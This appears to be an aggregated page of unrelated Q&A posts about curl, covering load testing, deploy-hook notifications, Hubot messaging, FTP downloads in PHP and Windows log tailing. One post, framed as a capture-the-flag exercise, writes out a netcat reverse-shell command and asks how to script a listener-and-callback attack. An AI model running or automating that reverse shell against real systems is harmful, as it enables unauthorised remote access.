What's the quickest way to create concurrent curl requests? I have a app which accepts POST requests and would like to do some load testing
I would like to run the following cURL command concurrently and not sequentially
curl -d "param1=value1¶m2=value2" http://example.com/test
Thanks
How about ApacheBench? You've probably already got it installed.
I am not confident but spawning multiple processes in the bachground?
nohup curl -parameters &
For load testing perhaps you need something like multi-threading, you might also want to research for already available tools.
I do this kind of thing (generating concurrent POST requests) with a few small perl scripts I wrote:
http://patrick.net/sprocket/rwt.html
I'm planning to port it to python, but the perl version works pretty well right now.
Related
I'm doing an exercise (basically just a CTF), where we do some exploits of some vulnerable machines. For example, by sending a specially crafted post request, we can make it execute for example
nc -e /bin/bash 10.0.0.2 2546
What I want to do, is to script my way out of this, to make it easier.
Setup a listener for a specific port
Send a post request to make the machine connect back
Send arbitrary data to the server, e.g. to escalate privileges.
Present user with the shell (e.g. which is sent through nc)
This is not a post on how to either hack it or escalate privileges, but my scripting capabilities (especially in bash!) is not the best.
The problem is when I reach step 2. For obvious reason, I can't start nc -lvp 1234 before sending the post request, since it blocks. And I'm faily sure multithreading in bash is not possible (...somebody have probably made it though.)
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data
* MAGIC CONNECTION *
And let's say that I actually succeed with a connection back home, how would I manage to send data from my script, though netcat, before presenting the user with a working shell? Maybe something with piping the netcat data to a file, and use that as a "buffer"?
I know there is a lot of questions, and it can't be answered with one answer, but I'd like to hear more about how people would do that. OR if it's completely ridiculous to do in bash.
I'm trying to implement a message sending on my platform.sh server. The idea would be to use the existing hooks:deploy: hook in the configuration file to make a bash curl call that would send a message to an api "Deploy completed".
I use a curl snippet that works like a charm on my local machine, though the message is never sent from the server on a new deploy.
I know that the correct interpreter is bash, since the existing example in platform.sh docs is using bash code. Though, it's indicated in the docs that the disk is in read-only mode during this hook, would that be the cause of the issue?
Thanks a lot!
~SPJ
For posterity: also note that this may already exist by default in Platform.sh you can use the webhook integration to get notified of any activity.
$ platform integration:add --type=webhook --url=A-URL-THAT-CAN-RECEIVE-THE-POSTED-JSON
Details on https://docs.platform.sh/administration/integrations/webhooks.html
Hmm, I thought it was irrelevant, but French text with accents in the API parameters was causing the issue...
Hope this will help others.
~SPJ
I'm running Hubot on Heroku and have connected it to Hipchat.
I'd now like to use Curl to post third-party information to the Hubot, when appropriate.
There are two scripts that seem the right fit, http-post-say.coffee or http-say.coffee. I can't get either to work.
http-post-say points to port 8080, which I don't believe will work on Heroku, and http-say simply doesn't post, without any error message.
Both scripts have zero config, and I've successfully deployed several other scripts, so I'm at a loss.
Has anyone successfully used either script in the scenario I've described, or taken a different approach to reach the same goal?
This answer is a bit late.
httpd-post-say just worked for me ignore the port 8080 for heroku just use your app url (app-name.herokuapp.com). The more confusing thing for me was for room you need to use the XMPP JID which looks like 12345_something#conf.hipchat.com. So to post a message it would look as follows for heroku.
curl -X POST http://app-name.herokuapp.com/hubot/say -d message='Hello World' -d room='12345_room_name#conf.hipchat.com'
How should I download file from an ftp server to my local machine using php? Is curl good for this?
you can use wget, or curl, from PHP. Be aware that the PHP script will wait for the download to finish. So if the download takes longer than your PHPs max_execution_time, your PHP script will be killed during runtime.
The best way to implement something like this is by doing it asynchronously, that way you don't slow down the execution of the PHP script which is probably supposed to serve a page later.
There are many ways to implement it asynchronously. The cleanest one is probably to use some queue like RabbitMQ or ZeroMQ over AMQP. A less clean one, which works as well, would be writing the urls to download into a file, and then implement a cronjob which minutely checkes this file for new urls to download and executes the download.
just some ideas...
(Briefly, like this question but for Windows servers.)
I have several Win2003 servers running custom application services (C/C++, not Java) that write text-based logs in a custom format.
[2009-07-17 12:34:56.7890]\t INFO\t<ThreadID>\tLog message...
[2009-07-17 12:34:56.7890]\t *WARN\t<ThreadID>\tLog message...
[2009-07-17 12:34:56.7890]\t**ERR \t<ThreadID>\tLog message...
I would like to have a way to easily and efficiently (over a not-very-fast VPN) "watch" these logs for lines that match a pattern (like tail -f |grep -E on linux). Ideally the output would need to be aggregated, not one window/shell per file or per server, and a Windows application would be best, so that I can put it in front of people who are command-line-phobic.
Any recommendations?
edit: fixed link
Try using baretail
splunk from www.splunk.com is the way to go. It is free & does exactly what you are asking for.